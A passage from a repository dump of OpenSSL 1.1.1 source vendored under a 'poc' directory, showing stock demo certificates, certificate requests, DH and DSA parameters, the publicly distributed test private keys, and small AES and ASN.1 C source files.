IZvORB1edmwMwIgSB4cgoFECrG5pixzYxKauZkAwKG9/+L4DB8qXRjfXWcvafcOU 6 | DlYpRROykJ7wGkiqmqbZyrxY8DWjk5ZZQXiSuhYOAJB+Fyfb11JZV6+CvBQX/1g+ 7 | vhJr39Gmp6oAesoYrj90ecozClmnAgMBAAGgADANBgkqhkiG9w0BAQsFAAOBgQCo 8 | 2jE7J1SNV7kyRm9m8CoPw8xYsuVcVFxPheBymYp8BlO0/rSdYygRjobpYnLVRUPZ 9 | pV792wzT1Rp4sXfZWO10lkFY4yi0pH2cdK2RX7qedibV1Xu9vt/yYANFBKVpA4dy 10 | PRyTQwi3In1N8hdfddpYR8f5MIUYRe5poFMIJcf8JA== 11 | -----END CERTIFICATE REQUEST----- 12 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/cert.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIBoDCCAUoCAQAwDQYJKoZIhvcNAQEEBQAwYzELMAkGA1UEBhMCQVUxEzARBgNV 3 | BAgTClF1ZWVuc2xhbmQxGjAYBgNVBAoTEUNyeXB0U29mdCBQdHkgTHRkMSMwIQYD 4 | VQQDExpTZXJ2ZXIgdGVzdCBjZXJ0ICg1MTIgYml0KTAeFw05NzA5MDkwMzQxMjZa 5 | Fw05NzEwMDkwMzQxMjZaMF4xCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0 6 | YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQxFzAVBgNVBAMT 7 | DkVyaWMgdGhlIFlvdW5nMFEwCQYFKw4DAgwFAANEAAJBALVEqPODnpI4rShlY8S7 8 | tB713JNvabvn6Gned7zylwLLiXQAo/PAT6mfdWPTyCX9RlId/Aroh1ou893BA32Q 9 | sggwDQYJKoZIhvcNAQEEBQADQQCU5SSgapJSdRXJoX+CpCvFy+JVh9HpSjCpSNKO 10 | 19raHv98hKAUJuP9HyM+SUsffO6mAIgitUaqW8/wDMePhEC3 11 | -----END CERTIFICATE----- 12 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/ct_log_list.cnf: -------------------------------------------------------------------------------- 1 | # This file specifies the Certificate Transparency logs 2 | # that are to be trusted. 3 | 4 | # Google's list of logs can be found here: 5 | # www.certificate-transparency.org/known-logs 6 | # A Python program to convert the log list to OpenSSL's format can be 7 | # found here: 8 | # https://github.com/google/certificate-transparency/blob/master/python/utilities/log_list/print_log_list.py 9 | # Use the "--openssl_output" flag. 10 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/demoSRP/srp_verifier.txt.attr: -------------------------------------------------------------------------------- 1 | unique_subject = yes 2 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/dh1024.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN DH PARAMETERS----- 2 | MIGHAoGBAP//////////yQ/aoiFowjTExmKLgNwc0SkCTgiKZ8x0Agu+pjsTmyJR 3 | Sgh5jjQE3e+VGbPNOkMbMCsKbfJfFDdP4TVtbVHCReSFtXZiXn7G9ExC6aY37WsL 4 | /1y29Aa37e44a/taiZ+lrp8kEXxLH+ZJKGZR7OZTgf//////////AgEC 5 | -----END DH PARAMETERS----- 6 | 7 | These are the 1024-bit DH parameters from "Internet Key Exchange 8 | Protocol Version 2 (IKEv2)": https://tools.ietf.org/html/rfc5996 9 | 10 | See https://tools.ietf.org/html/rfc2412 for how they were generated. 11 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/dh2048.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN DH PARAMETERS----- 2 | MIIBCAKCAQEA///////////JD9qiIWjCNMTGYouA3BzRKQJOCIpnzHQCC76mOxOb 3 | IlFKCHmONATd75UZs806QxswKwpt8l8UN0/hNW1tUcJF5IW1dmJefsb0TELppjft 4 | awv/XLb0Brft7jhr+1qJn6WunyQRfEsf5kkoZlHs5Fs9wgB8uKFjvwWY2kg2HFXT 5 | mmkWP6j9JM9fg2VdI9yjrZYcYvNWIIVSu57VKQdwlpZtZww1Tkq8mATxdGwIyhgh 6 | fDKQXkYuNs474553LBgOhgObJ4Oi7Aeij7XFXfBvTFLJ3ivL9pVYFxg5lUl86pVq 7 | 5RXSJhiY+gUQFXKOWoqsqmj//////////wIBAg== 8 | -----END DH PARAMETERS----- 9 | 10 | These are the 2048-bit DH parameters from "More Modular Exponential 11 | (MODP) Diffie-Hellman groups for Internet Key Exchange (IKE)": 12 | https://tools.ietf.org/html/rfc3526 13 | 14 | See https://tools.ietf.org/html/rfc2412 for how they were generated. 15 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/dsa1024.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN DSA PARAMETERS----- 2 | MIIBHgKBgQCnP26Fv0FqKX3wn0cZMJCaCR3aajMexT2GlrMV4FMuj+BZgnOQPnUx 3 | mUd6UvuF5NmmezibaIqEm4fGHrV+hktTW1nPcWUZiG7OZq5riDb77Cjcwtelu+Us 4 | OSZL2ppwGJU3lRBWI/YV7boEXt45T/23Qx+1pGVvzYAR5HCVW1DNSQIVAPcHMe36 5 | bAYD1YWKHKycZedQZmVvAoGATd9MA6aRivUZb1BGJZnlaG8w42nh5bNdmLsohkj8 6 | 3pkEP1+IDJxzJA0gXbkqmj8YlifkYofBe3RiU/xhJ6h6kQmdtvFNnFQPWAbuSXQH 7 | zlV+I84W9srcWmEBfslxtU323DQph2j2XiCTs9v15AlsQReVkusBtXOlan7YMu0O 8 | Arg= 9 | -----END DSA PARAMETERS----- 10 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/dsa512.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN DSA PARAMETERS----- 2 | MIGdAkEAnRtpjibb8isRcBmG9hnI+BnyGFOURgbQYlAzSwI8UjADizv5X9EkBk97 3 | TLqqQJv9luQ3M7stWtdaEUBmonZ9MQIVAPtT71C0QJIxVoZTeuiLIppJ+3GPAkEA 4 | gz6I5cWJc847bAFJv7PHnwrqRJHlMKrZvltftxDXibeOdPvPKR7rqCxUUbgQ3qDO 5 | L8wka5B33qJoplISogOdIA== 6 | -----END DSA PARAMETERS----- 7 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/dsap.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN DSA PARAMETERS----- 2 | MIGcAkEA+ZiKEvZmc9MtnaFZh4NiZ3oZS4J1PHvPrm9MXj5ntVheDPkdmBDTncya 3 | GAJcMjwsyB/GvLDGd6yGCw/8eF+09wIVAK3VagOxGd/Q4Af5NbxR5FB7CXEjAkA2 4 | t/q7HgVLi0KeKvcDG8BRl3wuy7bCvpjgtWiJc/tpvcuzeuAayH89UofjAGueKjXD 5 | ADiRffvSdhrNw5dkqdql 6 | -----END DSA PARAMETERS----- 7 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/pca-cert.srl: -------------------------------------------------------------------------------- 1 | 07 2 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/pca-key.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PRIVATE KEY----- 2 | MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBALYYjjtpLs/lfkPF 3 | xAFZ4V3He5mZFbsEakK9bA2fQaryreRwyfhbXbDJHyBV+c4xI5fbmmVd2t/us4k4 4 | rMhGsBtL89SqCEHhPJpLFywiQVmJTAjANYrWkZK5uR/++YmZyzuLfPHLButuK6cF 5 | GKXw3NNToxjYooMf0mad2rPX3cKTAgMBAAECgYBvrJ+Nz/Pli9jjt2V9bqHH4Y7r 6 | o/avuwVv6Ltbn0+mhy4d6w3yQhYzVSTBr/iDe59YglUt1WFl8/4nKZrNOIzHJlav 7 | Sw4hd3fYBHxbT+DgZMQ9ikjHECWRdDffrnlTLsSJAcxnpMJBPe3dKCRDMUrqWUvB 8 | IIKaxyqmXJms5Y/wAQJBAPFL9NMKJcWBftMKXCasxsV0ZGjgqHGZODYjtGFN9jJO 9 | 6AbZrxfCcapTWG4RCC2o/EDEMN8aArEhfdrYY3lhXGsCQQDBMRzFevkD7SYXTw5G 10 | NA/gJOAsFMYbt7tebcCRsHT7t3ymVfO2QwK7ZF0f/SYvi7cMAPraHvO7s3kFdGTB 11 | kDx5AkAHBICASsFCdzurA5gef9PgFjx9WFtNwnkCChPK6KuKVwUkfdw7wqnvnDDs 12 | Mo6cVVfQwmPxeR4u7JxuavCprQ01AkEAp5ZGAh1J9Jj9CQ1AMbAp8WOrvzGKJTM9 13 | 641Dll4/LLif/d7j2kDJFuvaSMyeGnKVqGkVMq/U+QeYPR4Z5TuM6QJAWK05qFed 14 | wYgTZyVN0MY53ZOMAIWwjz0cr24TvDfmsZqIvguGL616GKQZKdKDZQyQHg+dCzqJ 15 | HgIoacuFDKz5CA== 16 | -----END PRIVATE KEY----- 17 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/pca-req.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIBnDCCAQUCAQAwXDELMAkGA1UEBhMCQVUxEzARBgNVBAgMClF1ZWVuc2xhbmQx 3 | GjAYBgNVBAoMEUNyeXB0U29mdCBQdHkgTHRkMRwwGgYDVQQDDBNUZXN0IFBDQSAo 4 | MTAyNCBiaXQpMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC2GI47aS7P5X5D 5 | xcQBWeFdx3uZmRW7BGpCvWwNn0Gq8q3kcMn4W12wyR8gVfnOMSOX25plXdrf7rOJ 6 | OKzIRrAbS/PUqghB4TyaSxcsIkFZiUwIwDWK1pGSubkf/vmJmcs7i3zxywbrbiun 7 | BRil8NzTU6MY2KKDH9Jmndqz193CkwIDAQABoAAwDQYJKoZIhvcNAQELBQADgYEA 8 | eJdCB0nHnFK0hek4biAxX0GuJXkknuUy46NKEhv3GBwt4gtO29bfkbQTGOsBBKNs 9 | KptlnkItscOXY+0lSva9K3XlwD9do7k2IZFtXJVayZVw1GcKybIY0l7B6kcSxG7T 10 | f3CsO+ifdrsJKtyoZNs96lBMrtXyGybt3mgQNdZauQU= 11 | -----END CERTIFICATE REQUEST----- 12 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/privkey.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PRIVATE KEY----- 2 | MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBAMo7DFNMqywUA1O/ 3 | qvWqCOm6rGrUAcR+dKsSXw6y2qiKO7APDDyotc0b4Mxwqjga98npex2RBIwUoCGJ 4 | iEmMXo/a8RbXVUZ+ZwcAX7PC+XeXVC5qoajaBBkd2MvYmib/2PqnNrgvhHsUL5dO 5 | xhC7cRqxLM/g45k3Yyw+nGa+WkTdAgMBAAECgYBMBT5w4dVG0I8foGFnz+9hzWab 6 | Ee9IKjE5TcKmB93ilXQyjrWO5+zPmbc7ou6aAKk9IaPCTY1kCyzW7pho7Xdt+RFq 7 | TgVXGZZfqtixO7f2/5oqZAkd00eOn9ZrhBpVMu4yXbbDvhDyFe4/oy0HGDjRUhxa 8 | Lf6ZlBuTherxm4eFkQJBAPBQwRs9UtqaMAQlagA9pV5UsQjV1WT4IxDURMPfXgCd 9 | ETNkB6pP0SmxQm5xhv9N2HY1UtoWpug9s0OU5IJB15sCQQDXbfbjiujNbuOxCFNw 10 | 68JZaCFVdNovyOWORkpenQLNEjVkmTCS9OayK09ADEYtsdpUGKeF+2EYBNkFr5px 11 | CajnAkBMYI4PNz1HBuwt1SpMa0tMoMQnV7bbwVV7usskKbC5pzHZUHhzM6z5gEHp 12 | 0iEisT4Ty7zKXZqsgzefSgoaMAzzAkEAoCIaUhtwXzwdPfvNYnOs3J6doJMimECB 13 | +lbfcyLM8TimvadtRt+KGEg/OYGmLNM2UiqdY+duzdbUpvhYGcwvYwJAQvaoi9z2 14 | CkiwSs/PFrLaNlfLJmXRsUBzmiWYoh6+IQJJorEXz7ewI72ee9RBO4s746cgUFwH 15 | Ri+qO+HhZFUBqQ== 16 | -----END PRIVATE KEY----- 17 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/req.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIBlzCCAVcCAQAwXjELMAkGA1UEBhMCQVUxEzARBgNVBAgTClNvbWUtU3RhdGUx 3 | ITAfBgNVBAoTGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDEXMBUGA1UEAxMORXJp 4 | YyB0aGUgWW91bmcwge8wgaYGBSsOAwIMMIGcAkEA+ZiKEvZmc9MtnaFZh4NiZ3oZ 5 | S4J1PHvPrm9MXj5ntVheDPkdmBDTncyaGAJcMjwsyB/GvLDGd6yGCw/8eF+09wIV 6 | AK3VagOxGd/Q4Af5NbxR5FB7CXEjAkA2t/q7HgVLi0KeKvcDG8BRl3wuy7bCvpjg 7 | tWiJc/tpvcuzeuAayH89UofjAGueKjXDADiRffvSdhrNw5dkqdqlA0QAAkEAtUSo 8 | 84OekjitKGVjxLu0HvXck29pu+foad53vPKXAsuJdACj88BPqZ91Y9PIJf1GUh38 9 | CuiHWi7z3cEDfZCyCKAAMAkGBSsOAwIbBQADLwAwLAIUTg8amKVBE9oqC5B75dDQ 10 | Chy3LdQCFHKodGEj3LjuTzdm/RTe2KZL9Uzf 11 | -----END CERTIFICATE REQUEST----- 12 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/s1024key.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIICXgIBAAKBgQCzEfU8E+ZGTGtHXV5XhvM2Lg32fXUIjydXb34BGVPX6oN7+aNV 3 | S9eWayvW/+9/vUb0aCqilJrpFesgItV2T8VhhjOE++XUz46uNpcMU7wHMEAXUufP 4 | pztpFm8ZEk2tFKvadkSSoN8lb11juvZVkSkPlB65pFhSe4QKSp6J4HrkYwIDAQAB 5 | AoGBAKy8jvb0Lzby8q11yNLf7+78wCVdYi7ugMHcYA1JVFK8+zb1WfSm44FLQo/0 6 | dSChAjgz36TTexeLODPYxleJndjVcOMVzsLJjSM8dLpXsTS4FCeMbhw2s2u+xqKY 7 | bbPWfk+HOTyJjfnkcC5Nbg44eOmruq0gSmBeUXVM5UntlTnxAkEA7TGCA3h7kx5E 8 | Bl4zl2pc3gPAGt+dyfk5Po9mGJUUXhF5p2zueGmYWW74TmOWB1kzt4QRdYMzFePq 9 | zfDNXEa1CwJBAMFErdY0xp0UJ13WwBbUTk8rujqQdHtjw0klhpbuKkjxu2hN0wwM 10 | 6p0D9qxF7JHaghqVRI0fAW/EE0OzdHMR9QkCQQDNR26dMFXKsoPu+vItljj/UEGf 11 | QG7gERiQ4yxaFBPHgdpGo0kT31eh9x9hQGDkxTe0GNG/YSgCRvm8+C3TMcKXAkBD 12 | dhGn36wkUFCddMSAM4NSJ1VN8/Z0y5HzCmI8dM3VwGtGMUQlxKxwOl30LEQzdS5M 13 | 0SWojNYXiT2gOBfBwtbhAkEAhafl5QEOIgUz+XazS/IlZ8goNKdDVfYgK3mHHjvv 14 | nY5G+AuGebdNkXJr4KSWxDcN+C2i47zuj4QXA16MAOandA== 15 | -----END RSA PRIVATE KEY----- 16 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/s1024req.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIBojCCAQsCAQAwZDELMAkGA1UEBhMCQVUxEzARBgNVBAgTClF1ZWVuc2xhbmQx 3 | GjAYBgNVBAoTEUNyeXB0U29mdCBQdHkgTHRkMSQwIgYDVQQDExtTZXJ2ZXIgdGVz 4 | dCBjZXJ0ICgxMDI0IGJpdCkwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALMR 5 | 9TwT5kZMa0ddXleG8zYuDfZ9dQiPJ1dvfgEZU9fqg3v5o1VL15ZrK9b/73+9RvRo 6 | KqKUmukV6yAi1XZPxWGGM4T75dTPjq42lwxTvAcwQBdS58+nO2kWbxkSTa0Uq9p2 7 | RJKg3yVvXWO69lWRKQ+UHrmkWFJ7hApKnongeuRjAgMBAAEwDQYJKoZIhvcNAQEE 8 | BQADgYEAStHlk4pBbwiNeQ2/PKTPPXzITYC8Gn0XMbrU94e/6JIKiO7aArq9Espq 9 | nrBSvC14dHcNl6NNvnkEKdQ7hAkcACfBbnOXA/oQvMBd4GD78cH3k0jVDoVUEjil 10 | frLfWlckW6WzpTktt0ZPDdAjJCmKVh0ABHimi7Bo9FC3wIGIe5M= 11 | -----END CERTIFICATE REQUEST----- 12 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/s512-key.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIBPAIBAAJBAJ+zw4Qnlf8SMVIPFe9GEcStgOY2Ww/dgNdhjeD8ckUJNP5VZkVD 3 | TGiXav6ooKXfX3j/7tdkuD8Ey2//Kv7+ue0CAwEAAQJAN6W31vDEP2DjdqhzCDDu 4 | OA4NACqoiFqyblo7yc2tM4h4xMbC3Yx5UKMN9ZkCtX0gzrz6DyF47bdKcWBzNWCj 5 | gQIhANEoojVt7hq+SQ6MCN6FTAysGgQf56Q3TYoJMoWvdiXVAiEAw3e3rc+VJpOz 6 | rHuDo6bgpjUAAXM+v3fcpsfZSNO6V7kCIQCtbVjanpUwvZkMI9by02oUk9taki3b 7 | PzPfAfNPYAbCJQIhAJXNQDWyqwn/lGmR11cqY2y9nZ1+5w3yHGatLrcDnQHxAiEA 8 | vnlEGo8K85u+KwIOimM48ZG8oTk7iFdkqLJR1utT3aU= 9 | -----END RSA PRIVATE KEY----- 10 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/s512-req.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIBGzCBxgIBADBjMQswCQYDVQQGEwJBVTETMBEGA1UECBMKUXVlZW5zbGFuZDEa 3 | MBgGA1UEChMRQ3J5cHRTb2Z0IFB0eSBMdGQxIzAhBgNVBAMTGlNlcnZlciB0ZXN0 4 | IGNlcnQgKDUxMiBiaXQpMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJ+zw4Qnlf8S 5 | MVIPFe9GEcStgOY2Ww/dgNdhjeD8ckUJNP5VZkVDTGiXav6ooKXfX3j/7tdkuD8E 6 | y2//Kv7+ue0CAwEAATANBgkqhkiG9w0BAQQFAANBAAB+uQi+qwn6qRSHB8EUTvsm 7 | 5TNTHzYDeN39nyIbZNX2s0se3Srn2Bxft5YCwD3moFZ9QoyDHxE0h6qLX5yjD+8= 8 | -----END CERTIFICATE REQUEST----- 9 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/server.srl: -------------------------------------------------------------------------------- 1 | 01 2 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/testCA.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIBBzCBsgIBADBNMQswCQYDVQQGEwJBVTETMBEGA1UECBMKUXVlZW5zbGFuZDEX 3 | MBUGA1UEChMOTWluY29tIFB0eSBMdGQxEDAOBgNVBAMTB1RFU1QgQ0EwXDANBgkq 4 | hkiG9w0BAQEFAANLADBIAkEAzW9brgA8efT2ODB+NrsflJZj3KKqKsm4OrXTRqfL 5 | VETj1ws/zCXl42XJAxdWQMCP0liKfc9Ut4xi1qCVI7N07wIDAQABoAAwDQYJKoZI 6 | hvcNAQEEBQADQQBjZZ42Det9Uw0AFwJy4ufUEy5Cv74pxBp5SZnljgHY+Az0Hs2S 7 | uNkIegr2ITX5azKi9nOkg9ZmsmGG13FIjiC/ 8 | -----END CERTIFICATE REQUEST----- 9 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/timeouts.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1999-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #ifndef OSSL_APPS_TIMEOUTS_H 11 | # define OSSL_APPS_TIMEOUTS_H 12 | 13 | /* numbers in us */ 14 | # define DGRAM_RCV_TIMEOUT 250000 15 | # define DGRAM_SND_TIMEOUT 250000 16 | 17 | #endif /* ! OSSL_APPS_TIMEOUTS_H */ 18 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/apps/vms_term_sock.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * Copyright 2016 VMS Software, Inc. All Rights Reserved. 4 | * 5 | * Licensed under the OpenSSL license (the "License"). You may not use 6 | * this file except in compliance with the License. You can obtain a copy 7 | * in the file LICENSE in the source distribution or at 8 | * https://www.openssl.org/source/license.html 9 | */ 10 | 11 | #ifndef OSSL_APPS_VMS_TERM_SOCK_H 12 | # define OSSL_APPS_VMS_TERM_SOCK_H 13 | 14 | /* 15 | ** Terminal Socket Function Codes 16 | */ 17 | # define TERM_SOCK_CREATE 1 18 | # define TERM_SOCK_DELETE 2 19 | 20 | /* 21 | ** Terminal Socket Status Codes 22 | */ 23 | # define TERM_SOCK_FAILURE 0 24 | # define TERM_SOCK_SUCCESS 1 25 | 26 | /* 27 | ** Terminal Socket Prototype 28 | */ 29 | int TerminalSocket (int FunctionCode, int *ReturnSocket); 30 | 31 | #endif 32 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/aes/aes_cbc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2002-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include 12 | 13 | void AES_cbc_encrypt(const unsigned char *in, unsigned char *out, 14 | size_t len, const AES_KEY *key, 15 | unsigned char *ivec, const int enc) 16 | { 17 | 18 | if (enc) 19 | CRYPTO_cbc128_encrypt(in, out, len, key, ivec, 20 | (block128_f) AES_encrypt); 21 | else 22 | CRYPTO_cbc128_decrypt(in, out, len, key, ivec, 23 | (block128_f) AES_decrypt); 24 | } 25 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/aes/aes_ecb.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2002-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | 12 | #include 13 | #include "aes_local.h" 14 | 15 | void AES_ecb_encrypt(const unsigned char *in, unsigned char *out, 16 | const AES_KEY *key, const int enc) 17 | { 18 | 19 | assert(in && out && key); 20 | assert((AES_ENCRYPT == enc) || (AES_DECRYPT == enc)); 21 | 22 | if (AES_ENCRYPT == enc) 23 | AES_encrypt(in, out, key); 24 | else 25 | AES_decrypt(in, out, key); 26 | } 27 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/aes/aes_misc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2002-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include 12 | #include "aes_local.h" 13 | 14 | const char *AES_options(void) 15 | { 16 | #ifdef FULL_UNROLL 17 | return "aes(full)"; 18 | #else 19 | return "aes(partial)"; 20 | #endif 21 | } 22 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/aes/aes_ofb.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2002-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include 12 | 13 | void AES_ofb128_encrypt(const unsigned char *in, unsigned char *out, 14 | size_t length, const AES_KEY *key, 15 | unsigned char *ivec, int *num) 16 | { 17 | CRYPTO_ofb128_encrypt(in, out, length, key, ivec, num, 18 | (block128_f) AES_encrypt); 19 | } 20 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/aes/aes_wrap.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2008-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include "internal/cryptlib.h" 11 | #include 12 | #include 13 | 14 | int AES_wrap_key(AES_KEY *key, const unsigned char *iv, 15 | unsigned char *out, 16 | const unsigned char *in, unsigned int inlen) 17 | { 18 | return CRYPTO_128_wrap(key, iv, out, in, inlen, (block128_f) AES_encrypt); 19 | } 20 | 21 | int AES_unwrap_key(AES_KEY *key, const unsigned char *iv, 22 | unsigned char *out, 23 | const unsigned char *in, unsigned int inlen) 24 | { 25 | return CRYPTO_128_unwrap(key, iv, out, in, inlen, 26 | (block128_f) AES_decrypt); 27 | } 28 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/aria/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | aria.c 4 | 5 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/asn1/a_octet.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1995-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include "internal/cryptlib.h" 12 | #include 13 | 14 | ASN1_OCTET_STRING *ASN1_OCTET_STRING_dup(const ASN1_OCTET_STRING *x) 15 | { 16 | return ASN1_STRING_dup(x); 17 | } 18 | 19 | int ASN1_OCTET_STRING_cmp(const ASN1_OCTET_STRING *a, 20 | const ASN1_OCTET_STRING *b) 21 | { 22 | return ASN1_STRING_cmp(a, b); 23 | } 24 | 25 | int ASN1_OCTET_STRING_set(ASN1_OCTET_STRING *x, const unsigned char *d, 26 | int len) 27 | { 28 | return ASN1_STRING_set(x, d, len); 29 | } 30 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/asn1/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | a_object.c a_bitstr.c a_utctm.c a_gentm.c a_time.c a_int.c a_octet.c \ 4 | a_print.c a_type.c a_dup.c a_d2i_fp.c a_i2d_fp.c \ 5 | a_utf8.c a_sign.c a_digest.c a_verify.c a_mbstr.c a_strex.c \ 6 | x_algor.c x_val.c x_sig.c x_bignum.c \ 7 | x_long.c x_int64.c x_info.c x_spki.c nsseq.c \ 8 | d2i_pu.c d2i_pr.c i2d_pu.c i2d_pr.c\ 9 | t_pkey.c t_spki.c t_bitst.c \ 10 | tasn_new.c tasn_fre.c tasn_enc.c tasn_dec.c tasn_utl.c tasn_typ.c \ 11 | tasn_prn.c tasn_scn.c ameth_lib.c \ 12 | f_int.c f_string.c n_pkey.c \ 13 | x_pkey.c bio_asn1.c bio_ndef.c asn_mime.c \ 14 | asn1_gen.c asn1_par.c asn1_lib.c asn1_err.c a_strnid.c \ 15 | evp_asn1.c asn_pack.c p5_pbe.c p5_pbev2.c p5_scrypt.c p8_pkey.c \ 16 | asn_moid.c asn_mstbl.c asn1_item_list.c 17 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/asn1/x_val.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1995-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include "internal/cryptlib.h" 12 | #include 13 | #include 14 | 15 | ASN1_SEQUENCE(X509_VAL) = { 16 | ASN1_SIMPLE(X509_VAL, notBefore, ASN1_TIME), 17 | ASN1_SIMPLE(X509_VAL, notAfter, ASN1_TIME) 18 | } ASN1_SEQUENCE_END(X509_VAL) 19 | 20 | 